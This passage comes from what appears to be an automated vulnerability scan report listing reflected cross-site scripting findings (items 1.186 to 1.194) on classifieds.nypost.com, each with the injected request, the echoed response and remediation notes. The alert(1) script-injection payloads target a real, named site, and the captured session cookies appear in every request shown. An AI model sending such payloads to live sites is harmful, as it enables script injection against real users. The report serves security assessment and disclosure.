Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Set-Cookie: otu=464dde5ca4883fed6a855f51a5f4de87; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.classifieds.nypost.com
Set-Cookie: ots=f7ae3d9d88e4c60783389785b3807c51; path=/; domain=.classifieds.nypost.com
Set-Cookie: a=dT1FMzFEREE3MzRDRjAxNkNE; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.classifieds.nypost.com
Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMjg5Mzt9; path=/; domain=.classifieds.nypost.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
<meta property="og:url" content="http://www.oodle.com/jobe558c"><script>alert(1)</script>30e5e0450f6/" />
...[SNIP]...

1.186. http://www.classifieds.nypost.com/post/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.classifieds.nypost.com
Path:   /post/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2440c"-alert(1)-"c811013299b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /post2440c"-alert(1)-"c811013299b/ HTTP/1.1
Host: www.classifieds.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: otu=cbfed66148755e439126da6455913c97; a=dT1GQjIyRkZFQzRDRjAxNUY3; 90184176_clogin=l=1290805822&v=1&e=1290809422731; l=r%3D5; CoreID6=51956591237812908058225; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; loc_USA=YToxOntpOjA7YTo0OntzOjM6ImxvYyI7TjtzOjY6InJhZGl1cyI7czoyOiIyNSI7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MToiNSI7fX0%3D; sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMjY4ODt9; cmTPSet=Y; ots=60bf76744e7ba6b01d483d356eed1708; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; UnicaID=3ba3b7OvjvD-WrLvxgh; loc_USA_selected=aTowOw%3D%3D; __qca=P0-309717630-1290805822624;

Response

HTTP/1.0 404 Not Found
Date: Fri, 26 Nov 2010 20:25:00 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMzEwMDt9; path=/; domain=.classifieds.nypost.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
--_--_--_--_-";
odl.reporting.replyExtraFields = "ny-_-nonclassifieds-_-nonclassifieds-_--_-nypost-_-USA-_-nypost-_-error-_--_--_--_--_--_--_-";
cmSetProduction();
cmCreateErrorTag("nonclassifieds post2440c"-alert(1)-"c811013299b/","10000000","ny-_-nonclassifieds-_-nonclassifieds-_-nypost USA-_-nypost-_-USA-_-nypost-_-error-_--_--_--_--_--_--_-");
</script>
...[SNIP]...

1.187. http://www.classifieds.nypost.com/post/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.classifieds.nypost.com
Path:   /post/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4b63c"><script>alert(1)</script>b15499556ff was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /post4b63c"><script>alert(1)</script>b15499556ff/ HTTP/1.1
Host: www.classifieds.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: otu=cbfed66148755e439126da6455913c97; a=dT1GQjIyRkZFQzRDRjAxNUY3; 90184176_clogin=l=1290805822&v=1&e=1290809422731; l=r%3D5; CoreID6=51956591237812908058225; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; loc_USA=YToxOntpOjA7YTo0OntzOjM6ImxvYyI7TjtzOjY6InJhZGl1cyI7czoyOiIyNSI7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MToiNSI7fX0%3D; sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMjY4ODt9; cmTPSet=Y; ots=60bf76744e7ba6b01d483d356eed1708; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; UnicaID=3ba3b7OvjvD-WrLvxgh; loc_USA_selected=aTowOw%3D%3D; __qca=P0-309717630-1290805822624;

Response

HTTP/1.0 404 Not Found
Date: Fri, 26 Nov 2010 20:24:59 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMzA5OTt9; path=/; domain=.classifieds.nypost.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
<meta property="og:url" content="http://www.oodle.com/post4b63c"><script>alert(1)</script>b15499556ff/" />
...[SNIP]...

1.188. http://www.classifieds.nypost.com/post/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.classifieds.nypost.com
Path:   /post/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 13e01"><script>alert(1)</script>97ca925315f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /post/?13e01"><script>alert(1)</script>97ca925315f=1 HTTP/1.1
Host: www.classifieds.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: otu=cbfed66148755e439126da6455913c97; a=dT1GQjIyRkZFQzRDRjAxNUY3; 90184176_clogin=l=1290805822&v=1&e=1290809422731; l=r%3D5; CoreID6=51956591237812908058225; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; loc_USA=YToxOntpOjA7YTo0OntzOjM6ImxvYyI7TjtzOjY6InJhZGl1cyI7czoyOiIyNSI7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MToiNSI7fX0%3D; sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMjY4ODt9; cmTPSet=Y; ots=60bf76744e7ba6b01d483d356eed1708; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; UnicaID=3ba3b7OvjvD-WrLvxgh; loc_USA_selected=aTowOw%3D%3D; __qca=P0-309717630-1290805822624;

Response

HTTP/1.1 200 OK
Date: Fri, 26 Nov 2010 20:24:58 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMzA5ODt9; path=/; domain=.classifieds.nypost.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 11577

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
<meta property="og:url" content="http://www.oodle.com/post/?13e01"><script>alert(1)</script>97ca925315f=1" />
...[SNIP]...

1.189. http://www.classifieds.nypost.com/post/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.classifieds.nypost.com
Path:   /post/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 16e1d"-alert(1)-"19c54cf058c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /post/?16e1d"-alert(1)-"19c54cf058c=1 HTTP/1.1
Host: www.classifieds.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: otu=cbfed66148755e439126da6455913c97; a=dT1GQjIyRkZFQzRDRjAxNUY3; 90184176_clogin=l=1290805822&v=1&e=1290809422731; l=r%3D5; CoreID6=51956591237812908058225; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; loc_USA=YToxOntpOjA7YTo0OntzOjM6ImxvYyI7TjtzOjY6InJhZGl1cyI7czoyOiIyNSI7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MToiNSI7fX0%3D; sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMjY4ODt9; cmTPSet=Y; ots=60bf76744e7ba6b01d483d356eed1708; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; UnicaID=3ba3b7OvjvD-WrLvxgh; loc_USA_selected=aTowOw%3D%3D; __qca=P0-309717630-1290805822624;

Response

HTTP/1.1 200 OK
Date: Fri, 26 Nov 2010 20:25:00 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMzEwMDt9; path=/; domain=.classifieds.nypost.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 11497

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
t-_-USA-_-nypost-_-post-_--_--_--_--_--_--_-";
odl.reporting.replyExtraFields = "ny-_-post-_-post-_--_-nypost-_-USA-_-nypost-_-post-_--_--_--_--_--_--_-";
cmSetProduction();
cmCreatePageviewTag("post ?16e1d"-alert(1)-"19c54cf058c=1","10000023","","","ny-_-post-_-post-_-nypost USA-_-nypost-_-USA-_-nypost-_-post-_--_--_--_--_--_--_-");
</script>
...[SNIP]...

1.190. http://www.classifieds.nypost.com/pro/register/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.classifieds.nypost.com
Path:   /pro/register/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6ef82"><script>alert(1)</script>51c27fc46b0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pro6ef82"><script>alert(1)</script>51c27fc46b0/register/ HTTP/1.1
Host: www.classifieds.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: otu=cbfed66148755e439126da6455913c97; a=dT1GQjIyRkZFQzRDRjAxNUY3; 90184176_clogin=l=1290805822&v=1&e=1290809720003; l=r%3D5; CoreID6=51956591237812908058225; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; loc_USA=YToxOntpOjA7YTo0OntzOjM6ImxvYyI7TjtzOjY6InJhZGl1cyI7czoyOiIyNSI7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MToiNSI7fX0%3D; sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMjk5NDt9; cmTPSet=Y; ots=60bf76744e7ba6b01d483d356eed1708; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; UnicaID=3ba3b7OvjvD-WrLvxgh; loc_USA_selected=aTowOw%3D%3D; __qca=P0-309717630-1290805822624;

Response

HTTP/1.0 404 Not Found
Date: Fri, 26 Nov 2010 20:33:21 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMzYwMTt9; path=/; domain=.classifieds.nypost.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
<meta property="og:url" content="http://www.oodle.com/pro6ef82"><script>alert(1)</script>51c27fc46b0/register/" />
...[SNIP]...

1.191. http://www.classifieds.nypost.com/pro/register/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.classifieds.nypost.com
Path:   /pro/register/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fce24"-alert(1)-"558676f4583 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /profce24"-alert(1)-"558676f4583/register/ HTTP/1.1
Host: www.classifieds.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: otu=cbfed66148755e439126da6455913c97; a=dT1GQjIyRkZFQzRDRjAxNUY3; 90184176_clogin=l=1290805822&v=1&e=1290809720003; l=r%3D5; CoreID6=51956591237812908058225; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; loc_USA=YToxOntpOjA7YTo0OntzOjM6ImxvYyI7TjtzOjY6InJhZGl1cyI7czoyOiIyNSI7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MToiNSI7fX0%3D; sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMjk5NDt9; cmTPSet=Y; ots=60bf76744e7ba6b01d483d356eed1708; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; UnicaID=3ba3b7OvjvD-WrLvxgh; loc_USA_selected=aTowOw%3D%3D; __qca=P0-309717630-1290805822624;

Response

HTTP/1.0 404 Not Found
Date: Fri, 26 Nov 2010 20:33:22 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMzYwMjt9; path=/; domain=.classifieds.nypost.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
_--_--_--_--_-";
odl.reporting.replyExtraFields = "ny-_-nonclassifieds-_-nonclassifieds-_--_-nypost-_-USA-_-nypost-_-error-_--_--_--_--_--_--_-";
cmSetProduction();
cmCreateErrorTag("nonclassifieds profce24"-alert(1)-"558676f4583/register/","10000000","ny-_-nonclassifieds-_-nonclassifieds-_-nypost USA-_-nypost-_-USA-_-nypost-_-error-_--_--_--_--_--_--_-");
</script>
...[SNIP]...

1.192. http://www.classifieds.nypost.com/pro/register/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.classifieds.nypost.com
Path:   /pro/register/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 110c4"-alert(1)-"06e49108037 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /pro/register110c4"-alert(1)-"06e49108037/ HTTP/1.1
Host: www.classifieds.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: otu=cbfed66148755e439126da6455913c97; a=dT1GQjIyRkZFQzRDRjAxNUY3; 90184176_clogin=l=1290805822&v=1&e=1290809720003; l=r%3D5; CoreID6=51956591237812908058225; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; loc_USA=YToxOntpOjA7YTo0OntzOjM6ImxvYyI7TjtzOjY6InJhZGl1cyI7czoyOiIyNSI7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MToiNSI7fX0%3D; sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMjk5NDt9; cmTPSet=Y; ots=60bf76744e7ba6b01d483d356eed1708; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; UnicaID=3ba3b7OvjvD-WrLvxgh; loc_USA_selected=aTowOw%3D%3D; __qca=P0-309717630-1290805822624;

Response

HTTP/1.0 404 Not Found
Date: Fri, 26 Nov 2010 20:33:24 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMzYwNDt9; path=/; domain=.classifieds.nypost.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
_--_-";
odl.reporting.replyExtraFields = "ny-_-nonclassifieds-_-nonclassifieds-_--_-nypost-_-USA-_-nypost-_-error-_--_--_--_--_--_--_-";
cmSetProduction();
cmCreateErrorTag("nonclassifieds pro/register110c4"-alert(1)-"06e49108037/","10000000","ny-_-nonclassifieds-_-nonclassifieds-_-nypost USA-_-nypost-_-USA-_-nypost-_-error-_--_--_--_--_--_--_-");
</script>
...[SNIP]...

1.193. http://www.classifieds.nypost.com/pro/register/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.classifieds.nypost.com
Path:   /pro/register/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fe676"><script>alert(1)</script>d1c74ecb45a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pro/registerfe676"><script>alert(1)</script>d1c74ecb45a/ HTTP/1.1
Host: www.classifieds.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: otu=cbfed66148755e439126da6455913c97; a=dT1GQjIyRkZFQzRDRjAxNUY3; 90184176_clogin=l=1290805822&v=1&e=1290809720003; l=r%3D5; CoreID6=51956591237812908058225; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; loc_USA=YToxOntpOjA7YTo0OntzOjM6ImxvYyI7TjtzOjY6InJhZGl1cyI7czoyOiIyNSI7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MToiNSI7fX0%3D; sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMjk5NDt9; cmTPSet=Y; ots=60bf76744e7ba6b01d483d356eed1708; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; UnicaID=3ba3b7OvjvD-WrLvxgh; loc_USA_selected=aTowOw%3D%3D; __qca=P0-309717630-1290805822624;

Response

HTTP/1.0 404 Not Found
Date: Fri, 26 Nov 2010 20:33:23 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMzYwMzt9; path=/; domain=.classifieds.nypost.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
<meta property="og:url" content="http://www.oodle.com/pro/registerfe676"><script>alert(1)</script>d1c74ecb45a/" />
...[SNIP]...

1.194. http://www.classifieds.nypost.com/sale/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.classifieds.nypost.com
Path:   /sale/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 34569"-alert(1)-"97496bfe908 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sale34569"-alert(1)-"97496bfe908/ HTTP/1.1
Host: www.classifieds.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: otu=cbfed66148755e439126da6455913c97; a=dT1GQjIyRkZFQzRDRjAxNUY3; 90184176_clogin=l=1290805822&v=1&e=1290809422731; l=r%3D5; CoreID6=51956591237812908058225; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; loc_USA=YToxOntpOjA7YTo0OntzOjM6ImxvYyI7TjtzOjY6InJhZGl1cyI7czoyOiIyNSI7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MToiNSI7fX0%3D; sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMjY4ODt9; cmTPSet=Y; ots=60bf76744e7ba6b01d483d356eed1708; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; UnicaID=3ba3b7OvjvD-WrLvxgh; loc_USA_selected=aTowOw%3D%3D; __qca=P0-309717630-1290805822624;

Response

HTTP/1.0 404 Not Found
Date: Fri, 26 Nov 2010 20:24:53 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMzA5Mzt9; path=/; domain=.classifieds.nypost.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
--_--_--_--_-";
odl.reporting.replyExtraFields = "ny-_-nonclassifieds-_-nonclassifieds-_--_-nypost-_-USA-_-nypost-_-error-_--_--_--_--_--_--_-";
cmSetProduction();
